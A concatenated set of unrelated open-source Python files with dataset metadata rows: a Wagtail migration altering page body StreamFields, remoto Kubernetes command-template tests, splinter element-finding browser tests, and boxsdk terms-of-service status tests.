migrations.AlterField(
model_name='homepage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='indexpage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='peopleindexpage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='peoplepage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
migrations.AlterField(
model_name='richtextpage',
name='body',
field=wagtail.core.fields.StreamField([('h2', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h3', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h4', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('h5', wagtail.core.blocks.CharBlock(classname='title', icon='title')), ('home_page_block', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.URLBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('title', wagtail.core.blocks.CharBlock()), ('image', wagtail.images.blocks.ImageChooserBlock()), ('description', wagtail.core.blocks.TextBlock()), ('icon', cms.models.streamfield.IconChoiceBlock())], icon='placeholder')), ('intro', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('paragraph', wagtail.core.blocks.RichTextBlock(icon='pilcrow')), ('pullquote', wagtail.core.blocks.StructBlock([('quote', wagtail.core.blocks.TextBlock('quote title')), ('attribution', wagtail.core.blocks.CharBlock()), ('affiliation', wagtail.core.blocks.CharBlock(required=False)), ('style', cms.models.streamfield.PullQuoteStyleChoiceBlock())], icon='openquote')), ('image', wagtail.core.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock()), ('caption', wagtail.core.blocks.RichTextBlock()), ('alignment', cms.models.streamfield.ImageFormatChoiceBlock()), ('text', wagtail.core.blocks.RichTextBlock(required=False))], icon='image', label='Aligned image and text')), ('document', wagtail.documents.blocks.DocumentChooserBlock(icon='doc-full-inverse')), ('link', wagtail.core.blocks.StructBlock([('url', wagtail.core.blocks.CharBlock(required=False)), ('page', wagtail.core.blocks.PageChooserBlock(required=False)), ('label', wagtail.core.blocks.CharBlock()), ('style', cms.models.streamfield.LinkStyleChoiceBlock())], icon='link')), ('embed', wagtail.embeds.blocks.EmbedBlock(icon='media')), ('html', wagtail.core.blocks.StructBlock([('html', wagtail.core.blocks.RawHTMLBlock()), ('alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), ('table', wagtail.contrib.table_block.blocks.TableBlock(icon='table', label='Table')), ('text_list', cms.models.streamfield.TextListBlock(icon='table', label='Text List'))]),
),
]
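
# Note (illustrative, not Django-generated): every AlterField above repeats the
# same StreamField block list verbatim. A hand-maintained migration could
# define it once and reuse it, roughly:
#
#     BODY_BLOCKS = [...]  # the shared block list from above
#     operations = [
#         migrations.AlterField(model_name=name, name='body',
#                               field=wagtail.core.fields.StreamField(BODY_BLOCKS))
#         for name in ('blogindexpage', 'blogpost', 'homepage', 'indexpage',
#                      'peopleindexpage', 'peoplepage', 'richtextpage')
#     ]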
| 305.017857 | 2,272 | 0.730227 | 1,871 | 17,081 | 6.645644 | 0.056654 | 0.156587 | 0.23106 | 0.131736 | 0.96783 | 0.965417 | 0.965417 | 0.965417 | 0.965417 | 0.965417 | 0 | 0.00368 | 0.061296 | 17,081 | 55 | 2,273 | 310.563636 | 0.771797 | 0.002635 | 0 | 0.571429 | 1 | 0 | 0.162909 | 0.00135 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.163265 | 0 | 0.22449 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
c779bf79d7f2c7e91fea5c4543f8cd5e0971a8df | 1,925 | py | Python | remoto/tests/backends/test_kubernetes.py | chombourger/remoto | 8dc32e21246f003f4fabd6cc2e06fed9d827e8b9 | [
"MIT"
] | 22 | 2015-01-30T07:47:00.000Z | 2021-09-15T01:39:01.000Z | remoto/tests/backends/test_kubernetes.py | chombourger/remoto | 8dc32e21246f003f4fabd6cc2e06fed9d827e8b9 | [
"MIT"
] | 42 | 2015-01-05T15:27:33.000Z | 2021-09-03T20:07:38.000Z | remoto/tests/backends/test_kubernetes.py | chombourger/remoto | 8dc32e21246f003f4fabd6cc2e06fed9d827e8b9 | [
"MIT"
] | 23 | 2015-01-02T22:06:42.000Z | 2022-03-24T17:09:40.000Z | from remoto.backends import kubernetes
class TestCommandTemplate(object):
def test_using_podname_only(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf')
tmpl = conn.command_template()
assert tmpl == ['kubectl', 'exec', '-i', 'rook-ceph-asdf', '--', '/bin/sh', '-c']
def test_using_namespace(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf', 'rook-ceph')
tmpl = conn.command_template()
assert tmpl == [
'kubectl', 'exec', '-i', '-n', 'rook-ceph',
'rook-ceph-asdf', '--', '/bin/sh', '-c'
]
def test_using_context(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf', context='4')
tmpl = conn.command_template()
assert tmpl == [
'kubectl', '--context', '4', 'exec', '-i',
'rook-ceph-asdf', '--', '/bin/sh', '-c'
]
def test_using_context_and_namespace(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf', 'rook-ceph', context='4')
tmpl = conn.command_template()
assert tmpl == [
'kubectl', '--context', '4', 'exec', '-i', '-n', 'rook-ceph',
'rook-ceph-asdf', '--', '/bin/sh', '-c'
]
class TestCommand(object):
def test_podname_conn_appends(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf', 'rook-ceph')
result = conn.cmd(['ceph', '--version'])
assert result == [
'kubectl', 'exec', '-i', '-n', 'rook-ceph',
'rook-ceph-asdf', '--', '/bin/sh', '-c', 'ceph --version'
]
def test_namespace_appends(self):
conn = kubernetes.KubernetesConnection('rook-ceph-asdf', 'rook-ceph')
result = conn.cmd(['ceph', 'health'])
assert result == [
'kubectl', 'exec', '-i', '-n', 'rook-ceph',
'rook-ceph-asdf', '--', '/bin/sh', '-c', 'ceph health'
]
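
# Illustrative only: given the command lists asserted above,
# conn.cmd(['ceph', 'health']) corresponds to the shell invocation
#
#     kubectl exec -i -n rook-ceph rook-ceph-asdf -- /bin/sh -c 'ceph health'
#
# (pod name and namespace values come from the test fixtures).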
| 36.320755 | 90 | 0.546494 | 205 | 1,925 | 5.034146 | 0.195122 | 0.155039 | 0.139535 | 0.22093 | 0.833333 | 0.833333 | 0.833333 | 0.736434 | 0.736434 | 0.665698 | 0 | 0.002784 | 0.253506 | 1,925 | 52 | 91 | 37.019231 | 0.715379 | 0 | 0 | 0.428571 | 0 | 0 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.02381 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c78f64402d9107c8ec502b5b91504ee4ec208443 | 9,035 | py | Python | tests/find_elements.py | kidosoft/splinter | 6d5052fd73c0a626299574cea76924e367c67faa | [
"BSD-3-Clause"
] | 1 | 2016-09-21T19:32:47.000Z | 2016-09-21T19:32:47.000Z | tests/find_elements.py | kidosoft/splinter | 6d5052fd73c0a626299574cea76924e367c67faa | [
"BSD-3-Clause"
] | null | null | null | tests/find_elements.py | kidosoft/splinter | 6d5052fd73c0a626299574cea76924e367c67faa | [
"BSD-3-Clause"
] | 1 | 2019-12-02T15:19:07.000Z | 2019-12-02T15:19:07.000Z | # -*- coding: utf-8 -*-
# Copyright 2012 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
from splinter.driver import ElementAPI
from splinter.element_list import ElementList
class FindElementsTest(object):
def test_finding_by_css(self):
value = self.browser.find_by_css('h1').value
self.assertEqual('Example Header', value)
def test_finding_by_xpath(self):
value = self.browser.find_by_xpath('//h1').value
self.assertEqual('Example Header', value)
def test_finding_by_tag(self):
value = self.browser.find_by_tag('h1').value
self.assertEqual('Example Header', value)
def test_finding_by_value(self):
value = self.browser.find_by_value('M').value
id = self.browser.find_by_id('gender-m')
self.assertEqual(id.value, value)
def test_finding_by_text(self):
element = self.browser.find_by_text('Complex')
self.assertEqual(element.value, 'Complex')
def test_finding_by_id(self):
value = self.browser.find_by_id("firstheader").value
self.assertEqual('Example Header', value)
def test_finding_by_name(self):
value = self.browser.find_by_name('query').value
self.assertEqual('default value', value)
def test_finding_all_elements_by_css(self):
value = self.browser.find_by_css('h1')[0].value
self.assertEqual('Example Header', value)
def test_finding_all_elements_by_xpath(self):
value = self.browser.find_by_xpath('//h1')[0].value
self.assertEqual('Example Header', value)
def test_finding_all_elements_by_tag(self):
value = self.browser.find_by_tag('h1')[0].value
self.assertEqual('Example Header', value)
def test_finding_all_elements_by_id(self):
value = self.browser.find_by_id("firstheader").value
self.assertEqual('Example Header', value)
def test_finding_all_elements_by_name(self):
value = self.browser.find_by_name('query').value
self.assertEqual('default value', value)
def test_finding_all_links_by_text(self):
link = self.browser.find_link_by_text('Link for Example.com')[0]
self.assertEqual('http://example.com/', link['href'])
def test_finding_all_links_by_href(self):
link = self.browser.find_link_by_href('http://example.com/')[0]
self.assertEqual('http://example.com/', link['href'])
def test_finding_all_links_by_partial_href(self):
link = self.browser.find_link_by_partial_href('example.c')[0]
self.assertEqual('http://example.com/', link['href'])
def test_finding_all_links_by_partial_text(self):
link = self.browser.find_link_by_partial_text('FOO')[0]
self.assertEqual('http://localhost:5000/foo', link['href'])
def test_finding_last_element_by_css(self):
value = self.browser.find_by_css('h1').last.value
self.assertEqual('Example Last Header', value)
def test_finding_last_element_by_xpath(self):
value = self.browser.find_by_xpath('//h1').last.value
self.assertEqual('Example Last Header', value)
def test_finding_last_element_by_tag(self):
value = self.browser.find_by_tag('h1').last.value
self.assertEqual('Example Last Header', value)
def test_finding_last_element_by_id(self):
value = self.browser.find_by_id("firstheader").last.value
self.assertEqual('Example Header', value)
def test_last_element_is_same_than_first_element_in_find_by_id(self):
        # an HTML page contains at most one element per id
first = self.browser.find_by_id("firstheader").value
last = self.browser.find_by_id("firstheader").last.value
self.assertEqual(first, last)
def test_finding_last_element_by_name(self):
value = self.browser.find_by_name('input1').last.value
self.assertEqual('default last value', value)
def test_finding_last_link_by_text(self):
link = self.browser.find_link_by_text('Link for Example.com').last
self.assertEqual('http://example.com/last', link['href'])
def test_finding_last_link_by_href(self):
link = self.browser.find_link_by_href('http://example.com/').last
self.assertEqual('Link for last Example.com', link.text)
def test_finding_link_by_partial_href(self):
link = self.browser.find_link_by_partial_href('example.c').last
self.assertEqual('Link for last Example.com', link.text)
def test_finding_last_link_by_partial_text(self):
link = self.browser.find_link_by_partial_text('FOO').last
self.assertEqual('A wordier (and last) link to FOO', link.text)
def test_finding_element_by_css_using_slice(self):
value = self.browser.find_by_css('h1')[-1].value
self.assertEqual('Example Last Header', value)
def test_finding_element_by_xpath_using_slice(self):
value = self.browser.find_by_xpath('//h1')[-1].value
self.assertEqual('Example Last Header', value)
def test_finding_element_by_tag_using_slice(self):
value = self.browser.find_by_tag('h1')[-1].value
self.assertEqual('Example Last Header', value)
def test_finding_element_by_id_using_slice(self):
value = self.browser.find_by_id("firstheader")[-1].value
self.assertEqual('Example Header', value)
def test_all_elements_is_same_than_first_element_in_find_by_id(self):
        # an HTML page contains at most one element per id
first = self.browser.find_by_id("firstheader").value
some = self.browser.find_by_id("firstheader")[-1].value
self.assertEqual(first, some)
def test_finding_element_by_name_using_slice(self):
value = self.browser.find_by_name('input1')[-1].value
self.assertEqual('default last value', value)
def test_finding_link_by_text_using_slice(self):
link = self.browser.find_link_by_text('Link for Example.com')[-1]
self.assertEqual('http://example.com/last', link['href'])
def test_finding_link_by_href_using_slice(self):
"should find link by href using slice"
link = self.browser.find_link_by_href('http://example.com/')[-1]
self.assertEqual('Link for last Example.com', link.text)
def test_finding_links_by_text(self):
"should find links by text"
link = self.browser.find_link_by_text('Link for Example.com')
self.assertEqual('http://example.com/', link['href'])
def test_finding_links_by_href(self):
"should find links by href"
link = self.browser.find_link_by_href('http://example.com/')
self.assertEqual('http://example.com/', link['href'])
def test_find_by_css_in_element_context(self):
"should find elements by css in element context and should return splinter driver element"
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_css('h2')
self.assertEqual(decendent.text.strip(), 'inside')
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent[0], ElementAPI)
def test_find_by_xpath_in_element_context(self):
"should find elements by xpath in element context"
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_xpath("//h2")
self.assertEqual(decendent.text.strip(), 'inside')
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent.first, ElementAPI)
def test_find_by_name_in_element_context(self):
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_name("upload")
self.assertEqual(len(decendent), 1)
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent.first, ElementAPI)
def test_find_by_tag_in_element_context(self):
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_tag("input")
self.assertEqual(len(decendent), 1)
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent.first, ElementAPI)
def test_find_by_id_in_element_context(self):
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_id("visible")
self.assertEqual(len(decendent), 1)
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent.first, ElementAPI)
def test_find_by_value_in_element_context(self):
elements = self.browser.find_by_css("#inside")
decendent = elements[0].find_by_value("crazy diamond")
self.assertEqual(len(decendent), 1)
self.assertIsInstance(decendent, ElementList)
self.assertIsInstance(decendent.first, ElementAPI)
def test_finding_by_text_in_element_context(self):
body = self.browser.find_by_tag('body')
element = body.find_by_text('Complex')
self.assertEqual(element.value, 'Complex')
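
# Illustrative only (not part of the suite): this mixin expects a
# `self.browser` fixture supplied by the concrete test case. A standalone
# session would look roughly like:
#
#     from splinter import Browser
#     with Browser('firefox') as browser:
#         browser.visit('http://localhost:5000/')
#         print(browser.find_by_css('h1').first.value)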
| 42.41784 | 98 | 0.700941 | 1,232 | 9,035 | 4.855519 | 0.086851 | 0.049147 | 0.115346 | 0.096623 | 0.889 | 0.835339 | 0.816449 | 0.815112 | 0.761618 | 0.738549 | 0 | 0.006905 | 0.182512 | 9,035 | 212 | 99 | 42.617925 | 0.803006 | 0.053901 | 0 | 0.383648 | 0 | 0 | 0.147907 | 0 | 0 | 0 | 0 | 0 | 0.345912 | 1 | 0.27044 | false | 0 | 0.012579 | 0 | 0.289308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c79c911a02a7e6816199f100b0939328362f9712 | 115 | py | Python | holobot/framework/lifecycle/__init__.py | rexor12/holobot | 89b7b416403d13ccfeee117ef942426b08d3651d | [
"MIT"
] | 1 | 2021-05-24T00:17:46.000Z | 2021-05-24T00:17:46.000Z | holobot/framework/lifecycle/__init__.py | rexor12/holobot | 89b7b416403d13ccfeee117ef942426b08d3651d | [
"MIT"
] | 41 | 2021-03-24T22:50:09.000Z | 2021-12-17T12:15:13.000Z | holobot/framework/lifecycle/__init__.py | rexor12/holobot | 89b7b416403d13ccfeee117ef942426b08d3651d | [
"MIT"
] | null | null | null | from .lifecycle_manager import LifecycleManager
from .lifecycle_manager_interface import LifecycleManagerInterface
| 38.333333 | 66 | 0.913043 | 11 | 115 | 9.272727 | 0.636364 | 0.254902 | 0.392157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069565 | 115 | 2 | 67 | 57.5 | 0.953271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c7f5e5cce74eb16d8d735c6c0bdd4a2d4b03656c | 2,979 | py | Python | test/unit/object/test_terms_of_service_user_status.py | jayneeljariwala/box-python-sdk | 39aa284c776817453e4a75533a7e0b5516c03752 | [
"Apache-2.0"
] | 367 | 2015-02-10T05:55:45.000Z | 2022-03-16T23:39:58.000Z | test/unit/object/test_terms_of_service_user_status.py | jayneeljariwala/box-python-sdk | 39aa284c776817453e4a75533a7e0b5516c03752 | [
"Apache-2.0"
] | 686 | 2015-02-10T01:21:28.000Z | 2022-03-31T11:40:22.000Z | test/unit/object/test_terms_of_service_user_status.py | jayneeljariwala/box-python-sdk | 39aa284c776817453e4a75533a7e0b5516c03752 | [
"Apache-2.0"
] | 260 | 2015-02-16T17:35:06.000Z | 2022-03-20T17:45:28.000Z | # coding: utf-8
from __future__ import unicode_literals
import json
from boxsdk.object.terms_of_service_user_status import TermsOfServiceUserStatus
from boxsdk.config import API
def test_get(test_terms_of_service_user_status, mock_box_session):
    created_at = '2016-05-18T17:38:03-07:00'  # no trailing comma: a plain string, not a 1-tuple
expected_url = '{0}/terms_of_service_user_statuses/{1}'.format(API.BASE_API_URL, test_terms_of_service_user_status.object_id)
mock_box_session.get.return_value.json.return_value = {
'type': 'terms_of_service_user_status',
'id': test_terms_of_service_user_status.object_id,
'created_at': created_at
}
terms_of_service = test_terms_of_service_user_status.get()
mock_box_session.get.assert_called_once_with(expected_url, headers=None, params=None)
assert isinstance(terms_of_service, TermsOfServiceUserStatus)
assert terms_of_service.type == test_terms_of_service_user_status.object_type
assert terms_of_service.id == test_terms_of_service_user_status.object_id
assert terms_of_service.created_at == created_at
def test_accept(test_terms_of_service_user_status, mock_box_session):
expected_url = '{0}/terms_of_service_user_statuses/{1}'.format(API.BASE_API_URL, test_terms_of_service_user_status.object_id)
mock_box_session.put.return_value.json.return_value = {
'type': test_terms_of_service_user_status.object_type,
'id': test_terms_of_service_user_status.object_id,
'is_accepted': True
}
data = {'is_accepted': True}
terms_of_service_user_status = test_terms_of_service_user_status.accept()
mock_box_session.put.assert_called_once_with(expected_url, data=json.dumps(data), headers=None, params=None)
assert isinstance(terms_of_service_user_status, TermsOfServiceUserStatus)
assert terms_of_service_user_status.type == test_terms_of_service_user_status.object_type
assert terms_of_service_user_status.id == test_terms_of_service_user_status.object_id
assert terms_of_service_user_status.is_accepted is True
def test_reject(test_terms_of_service_user_status, mock_box_session):
expected_url = '{0}/terms_of_service_user_statuses/{1}'.format(API.BASE_API_URL, test_terms_of_service_user_status.object_id)
mock_box_session.put.return_value.json.return_value = {
'type': 'terms_of_service_user_status',
'id': test_terms_of_service_user_status.object_id,
'is_accepted': False
}
data = {'is_accepted': False}
terms_of_service_user_status = test_terms_of_service_user_status.reject()
mock_box_session.put.assert_called_once_with(expected_url, data=json.dumps(data), headers=None, params=None)
assert isinstance(terms_of_service_user_status, TermsOfServiceUserStatus)
assert terms_of_service_user_status.type == test_terms_of_service_user_status.object_type
assert terms_of_service_user_status.id == test_terms_of_service_user_status.object_id
assert terms_of_service_user_status.is_accepted is False
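
# Illustrative only (not part of the tests): outside of unit tests a status
# object typically comes from an authenticated client, e.g.
#
#     status = client.terms_of_service_user_status('<status_id>')
#     status.accept()  # issues the PUT asserted in test_accept() above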
| 53.196429 | 129 | 0.806982 | 449 | 2,979 | 4.806236 | 0.138085 | 0.12975 | 0.2595 | 0.291937 | 0.848934 | 0.817424 | 0.790083 | 0.790083 | 0.790083 | 0.729379 | 0 | 0.009488 | 0.115475 | 2,979 | 55 | 130 | 54.163636 | 0.809488 | 0.004364 | 0 | 0.391304 | 0 | 0 | 0.090081 | 0.065789 | 0 | 0 | 0 | 0 | 0.326087 | 1 | 0.065217 | false | 0 | 0.086957 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1be591fee4a084667c4060b43e027a715175d6a2 | 780 | py | Python | tetris_cz19_multiplayer/icon.py | rushashell/cz19badge | 91be317bb0924f8eefec81ee1ebc19917f749771 | [
"MIT"
] | 1 | 2021-01-17T16:23:05.000Z | 2021-01-17T16:23:05.000Z | tetris_cz19_multiplayer/icon.py | rushashell/cz19badge | 91be317bb0924f8eefec81ee1ebc19917f749771 | [
"MIT"
] | null | null | null | tetris_cz19_multiplayer/icon.py | rushashell/cz19badge | 91be317bb0924f8eefec81ee1ebc19917f749771 | [
"MIT"
